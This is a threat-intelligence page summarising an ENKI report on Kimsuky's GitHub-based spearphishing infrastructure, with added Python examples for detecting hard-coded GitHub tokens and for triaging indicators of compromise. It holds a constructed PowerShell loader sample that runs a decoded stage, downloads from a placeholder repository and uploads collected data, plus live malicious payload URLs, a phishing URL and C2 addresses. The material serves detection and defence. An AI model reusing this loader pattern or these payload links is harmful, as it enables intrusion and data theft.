lazarusholic


Dissecting Kimsuky's Attacks on South Korea: In-Depth Analysis of GitHub-Based Malicious Infrastructure

2025-06-19, ENKI
https://www.enki.co.kr/en/media-center/tech-blog/dissecting-kimsuky-s-attacks-on-south-korea-in-depth-analysis-of-github-based-malicious-infrastructure
#Kimsuky #XenoRAT

Contents

EnkiWhiteHat
Executive Summary
A sophisticated spearphishing attack was detected in which GitHub was used as attack infrastructure to distribute malware.
The malware accesses the attacker's private repositories using a hardcoded GitHub Personal Access Token (PAT).
Log files stored in the private repository revealed an IP address used by the attacker for testing purposes.
Analysis of the XenoRAT C&C indicated links to the North Korean threat group Kimsuky.
1. Overview
During analysis of a malicious PowerShell script posted on X, a GitHub account that had been leveraged for attacks since March 2025 was discovered.
The malware contained a valid GitHub Personal Access Token (PAT) hardcoded by the attacker. We confirmed that this token was used to download malware from a private repository and to upload information collected from victim systems.
The files present in the repository were identified as malware, decoy files, and information from infected systems, demonstrating that the attacker abused GitHub as attack infrastructure.
This report details the …
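The pattern described above (a PAT hard-coded in a PowerShell loader, a download from a private repository through the GitHub contents API, and an upload of collected data with a PUT to the same API) is one an analyst can hunt for directly in recovered scripts. The following is an added example, not code from the ENKI report or from the malware it describes: it scans a script and any base64-wrapped stage inside it for GitHub's documented token formats and for the read/write API calls that together make up the repo-as-C2 pattern. The sample loader, the token value and the owner/repo names (example-user/example-repo) are constructed placeholders; the token is invalid.

```python
"""Scan a PowerShell loader for hard-coded GitHub tokens and repo-as-C2 API use.
Added example, not from the ENKI report or the malware. The sample loader, token
and owner/repo names (example-user/example-repo) are constructed placeholders."""
import base64
import re

# GitHub's documented token shapes: classic PAT / OAuth / user-to-server /
# server-to-server / refresh tokens are a 4-char prefix plus 36 alphanumerics;
# fine-grained PATs are github_pat_ plus 82 chars from [A-Za-z0-9_].
TOKEN_RE = re.compile(
    r"(?<![A-Za-z0-9_])(?:gh[pousr]_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{82})(?![A-Za-z0-9_])"
)
# Long base64 runs: PowerShell loaders routinely wrap the next stage this way.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

AUTH_RE = re.compile(r"Authorization\s*[=:]\s*['\"]?(?:token|Bearer)\b", re.I)
CONTENTS_RE = re.compile(r"api\.github\.com/repos/[^\s\"'/]+/[^\s\"'/]+/contents/", re.I)
RAW_RE = re.compile(r"raw\.githubusercontent\.com/", re.I)
PUT_RE = re.compile(r"-Method\s+Put\b", re.I)


def redact_token(tok):
    """Keep prefix and 4 chars either end so the finding is reportable, not reusable."""
    prefix = "github_pat_" if tok.startswith("github_pat_") else tok[:4]
    body = tok[len(prefix):]
    return f"{prefix}{body[:4]}...{body[-4:]}"


def classify_line(line):
    """Name the GitHub API behaviours visible on one script line."""
    kinds = []
    if AUTH_RE.search(line):
        kinds.append("github_auth_header")
    if CONTENTS_RE.search(line):
        # PUT to the contents API creates/updates a file: that is the upload path.
        kinds.append("github_contents_write" if PUT_RE.search(line) else "github_contents_read")
    if RAW_RE.search(line):
        kinds.append("github_raw_download")
    return kinds


def decode_b64_layers(text):
    """Yield plausible text recovered from long base64 blobs (UTF-8, then UTF-16LE)."""
    for m in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                s = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            printable = sum(c.isprintable() or c in "\r\n\t" for c in s)
            if s and printable / len(s) > 0.95:
                yield s
                break


def scan_script(text, max_depth=2):
    """Scan `text` and every base64-decoded layer nested inside it (to `max_depth`)."""
    findings = {"tokens": [], "indicators": []}
    pending, seen = [(0, text)], set()
    while pending:
        depth, body = pending.pop()
        if body in seen:
            continue
        seen.add(body)
        for m in TOKEN_RE.finditer(body):
            findings["tokens"].append({"layer": depth, "token": redact_token(m.group(0))})
        for lineno, line in enumerate(body.splitlines(), 1):
            for kind in classify_line(line):
                findings["indicators"].append({"layer": depth, "line": lineno, "kind": kind})
        if depth < max_depth:
            pending.extend((depth + 1, inner) for inner in decode_b64_layers(body))
    kinds = {i["kind"] for i in findings["indicators"]}
    downloads = {"github_contents_read", "github_raw_download"}
    # Token + download + upload through the same service is the repo-as-C2 pattern.
    findings["repo_as_c2"] = (bool(findings["tokens"]) and bool(kinds & downloads)
                              and "github_contents_write" in kinds)
    return findings


# Constructed sample (invented, invalid token; placeholder repo). The second stage
# is base64-wrapped so the scanner has to unwrap it to see the token and download.
INNER_STAGE = (
    '$tok = "ghp_x7Qm2Lp9Vb4Rn8Kw1Jc5Hd3Ft6Gy0Zs2Aa4E"\n'
    '$hdr = @{ Authorization = "token $tok"; Accept = "application/vnd.github.v3.raw" }\n'
    '$stage2 = Invoke-RestMethod -Uri "https://api.github.com/repos/example-user/example-repo/contents/stage2.dat" -Headers $hdr\n'
)
SAMPLE_LOADER = (
    '$blob = "' + base64.b64encode(INNER_STAGE.encode()).decode() + '"\n'
    '$code = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($blob))\n'
    'Invoke-Expression $code\n'
    '$body = @{ message = "log"; content = [Convert]::ToBase64String($collected) } | ConvertTo-Json\n'
    'Invoke-RestMethod -Uri "https://api.github.com/repos/example-user/example-repo/contents/$env:COMPUTERNAME.txt" -Method Put -Headers $hdr -Body $body\n'
)

if __name__ == "__main__":
    import json
    print(json.dumps(scan_script(SAMPLE_LOADER), indent=2))
```

Run as-is it reports the token at layer 1 (inside the decoded stage), the authenticated contents read at layer 1, the PUT upload at layer 0, and sets `repo_as_c2` to true. A recovered token should be reported to GitHub for revocation and used, while still valid, only in a controlled way to enumerate what the attacker stored; the redaction above is so the finding can travel in a report without carrying a usable credential.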

IoC

https://dl.dropboxusercontent.com/scl/fi/hpv3jd8o9annkala8vskb/hhopp.rtf?rlkey=nmwknu8l1ormxcmvo77ehhwr8&st=y99kquph&dl=0
http://80.71.157.55
https://dl.dropboxusercontent.com/scl/fi/3z2lxx1aor5g82e86c6ru/panel.rtf?rlkey=zaafvohxvwgvnfv383oe1vmt5&st=umtc7teu&dl=0
http://10.7.185.68
https://dl.dropboxusercontent.com/scl/fi/bifls0sn1nx1b52adydyn/tt7024.rtf?rlkey=le9xhv7v9clh9sof5787wl3da&st=rz6k0vgl&dl=0
https://dl.dropboxusercontent.com/scl/fi/okglg167i8kuwna1m2lxm/bie70er.rtf?rlkey=473ofwk5bcqsehgyw4dxs2ibv&st=ecned2g2&dl=0
http://158.247.202.109
http://101.36.114.190
http://165.154.78.9:443
https://raw.githubusercontent.com/luckmask/asp/main/xxx.rtf
http://165.154.78.9
http://192.168.35.35
https://dl.dropboxusercontent.com/scl/fi/ti6rphsns0xsvx1ekb02f/bie70er.rtf?rlkey=ug5wa6p2tzyq9rukv51dx4ity&st=hpuv2uwd&dl=0
http://10.33.77.174
http://158.247.230.196
http://141.164.41.17
http://216.244.74.115
http://118.194.249.201
https://dl.dropboxusercontent.com/scl/fi/c6ba7iwuke57d75j3mmte/eula.rtf?rlkey=t0jnirhxk48xdu8p74rqgv9dw&st=oofgjsq8&dl=0
http://216.244.74.115:80
https://dl.dropboxusercontent.com/scl/fi/67j5162v19rtngxkexau5/bie70er.rtf?rlkey=2kdy91rrcugaueif7aucd8b0d&st=mflxxjq7&dl=0
http://139.99.36.158
http://45.61.161.103
https://dl.dropboxusercontent.com/scl/fi/nanwt6elsuxziz05hnlt4/cjfansgmlans1-x.txt?rlkey=l6gzro1rswkqbk6tinxnkuylv&st=iv78c1cg&dl=0
https://raw.githubusercontent.com/Dasi274/star/main/xxx.rtf
https://dl.dropboxusercontent.com/scl/fi/bqicute746gcts2utf903/pong_race.rtf?rlkey=53r0g9f69khan7zkgzkc9ox90&st=nry1hb3s&dl=0
https://dl.dropboxusercontent.com/scl/fi/c6ba7iwuke57d75j3mmte/eula.rtf?rlkey=t0jnirhxk48xd8p74rqgv9dw&st=oofgjsq8&dl=0
http://158.247.202.109/invoice/?wreply=&m=https%3a%2f%2fnid.naver[.]com%2fnidlogin[.]login%3furl%3dhttp%253a%252f%252fmail.naver[.]com%252f
http://158.247.230.196:443
http://158.247.253.215
192.168.35.35
158.247.230.196
216.244.74.115
45.61.161.103
118.194.249.201
101.36.114.190
10.7.185.68
165.154.78.9
139.99.36.158
158.247.202.109
80.71.157.55
10.33.77.174
158.247.253.215
141.164.41.17
[email protected]
[email protected]
b36159563452d9a837a5e566ad2a1e44
a56edfef94008c77abfb4e151df934d9
57015267d06b0d80721015ccd29a04cd
5e9a80d3d4f71ecd8bf8e579a5e2449c
1dee4c60fffcc80eb4bbd523eedab2f4
157d1b1798f0f370a95125253e039c18
baf164d2a5066cab5772dc6ae4807f43
8c84d7f559cf0947fbf1981a0acb8a35
85f5075610661c9706571a33548d7585
a87659641e00d724de5662b14fe142e8
af999c3c615b56691d75e8c877e185fb
f692c1dd797f68c34744a377482c4ed4
7df07ecb0b516df085a5ee95ed8e6560
b77e4e9f5897f00dcbd08b2ee9bde7e8
976ad041832082f2d304df12b61457cb
b13ffe7b8e351291250f1a3a855134aa
b99c1d9bf70be5172a8b36b098c67ee5
522a122f3cd4c488a51d81c846bfabbb
acd2d728ee4d1110521524c1eac6204e
f51a2ccb4b9b2bf163c81b525bfac08e
a9d80e7fe3f217ea4d33f8a4a0f3f73c
6cbc007799b56682ac196e44d79e496d
d0a8cd7584547bdb2959f0d1008e6871
5be0527f5c84208371761cee852f0d7c
c2f88038d431bb190454fae02225e639
0cb6e67f23ccebc3727f755be5140497
1808bd4919c5943096a4a19784d6b8de
5076c579e378f976a57e862e5b6a7859
10ce9409d8d1e72ea6439bec7cd7e4cd
74b1d5f857a4245aef8189ac4f409a99
30d5f17d5e3f85be18220a7cab0b9fff
45ed6abfc12be606bdbcfe76bd17b2af
8c561a53085651d7f47b24129c2cd2d0
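Before this list goes into a blocklist or a hunt it needs normalising: it mixes URLs, bare IPs, MD5 hashes and e-mail addresses; one URL is defanged with [.]; several addresses (10.x, 192.168.x) are RFC 1918 ranges that cannot be external indicators and most likely came from the attacker's own test environment; and dl.dropboxusercontent.com and raw.githubusercontent.com are shared services where only the full URL, never the host, is a meaningful indicator. The following is an added example, not from the ENKI report or from lazarusholic, that performs that triage over a constructed subset of the list above (the "[email protected]" line is the page's own unrecoverable placeholder and is used here to show how unparseable entries are surfaced for review).

```python
"""Normalise and triage a flat IoC list before it is turned into blocks or hunts.
Added example, not from the ENKI report; SAMPLE_IOCS is a constructed subset of
the report's published indicators."""
import ipaddress
import re
from urllib.parse import urlsplit

# Legitimate shared hosting: act on the full URL, never on the host.
SHARED_HOSTS = {"dl.dropboxusercontent.com", "raw.githubusercontent.com"}
MD5_RE = re.compile(r"^[0-9a-fA-F]{32}$")
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
REVIEW_FLAGS = {"non_routable", "malformed", "unrecognized"}


def refang(value):
    """Undo common defanging so values parse: hxxp -> http, [.] -> ."""
    return (value.replace("[.]", ".")
                 .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def _ip_or_none(host):
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return None


def classify(line):
    """Return (kind, normalised value, flags) for one IoC line, or None if blank."""
    value = refang(line.strip())
    if not value:
        return None
    flags = []
    if MD5_RE.match(value):
        return ("md5", value.lower(), flags)
    if EMAIL_RE.match(value):
        return ("email", value.lower(), flags)
    if "://" in value:
        host = urlsplit(value).hostname or ""
        ip = _ip_or_none(host)
        if ip is None and "." not in host:
            flags.append("malformed")          # e.g. a URL cut off mid-host
        elif ip is not None and not ip.is_global:
            flags.append("non_routable")       # RFC 1918 / loopback / link-local host
        if host in SHARED_HOSTS:
            flags.append("shared_service")
        return ("url", value, flags)
    ip = _ip_or_none(value)
    if ip is not None:
        if not ip.is_global:
            flags.append("non_routable")
        return ("ip", str(ip), flags)
    flags.append("unrecognized")
    return ("other", value, flags)


def triage(lines):
    """Split indicators into actionable buckets plus a review queue."""
    out = {"ips": set(), "urls": [], "md5": [], "emails": [], "review": []}
    for line in lines:
        item = classify(line)
        if item is None:
            continue
        kind, value, flags = item
        if REVIEW_FLAGS & set(flags):
            out["review"].append((value, flags))
            continue
        if kind == "ip":
            out["ips"].add(value)
        elif kind == "url":
            out["urls"].append(value)
            host = urlsplit(value).hostname or ""
            if _ip_or_none(host) is not None:
                out["ips"].add(host)   # a URL on a bare public IP is also a network IoC
        elif kind == "md5":
            out["md5"].append(value)
        elif kind == "email":
            out["emails"].append(value)
    out["ips"] = sorted(out["ips"])
    return out


# Constructed subset of the indicators published in the report above.
SAMPLE_IOCS = """\
https://dl.dropboxusercontent.com/scl/fi/hpv3jd8o9annkala8vskb/hhopp.rtf?rlkey=nmwknu8l1ormxcmvo77ehhwr8&st=y99kquph&dl=0
http://80.71.157.55
http://10.7.185.68
http://165.154.78.9:443
https://raw.githubusercontent.com/luckmask/asp/main/xxx.rtf
http://165.154.78.9
https://nid
http://158.247.202.109/invoice/?wreply=&m=https%3a%2f%2fnid.naver[.]com%2fnidlogin[.]login%3furl%3dhttp%253a%252f%252fmail.naver[.]com%252f
192.168.35.35
80.71.157.55
[email protected]
b36159563452d9a837a5e566ad2a1e44
a56edfef94008c77abfb4e151df934d9
""".splitlines()

if __name__ == "__main__":
    for bucket, items in triage(SAMPLE_IOCS).items():
        print(bucket, items)
```

On the sample the public IPs collapse to three (the bare 80.71.157.55 and the URL on it are one indicator, as are the two 165.154.78.9 URLs), the private addresses, the truncated `https://nid` and the obfuscated e-mail placeholder land in the review queue, and the Dropbox and GitHub URLs are kept as full-URL indicators tagged `shared_service` so nobody blocks the hosting domain.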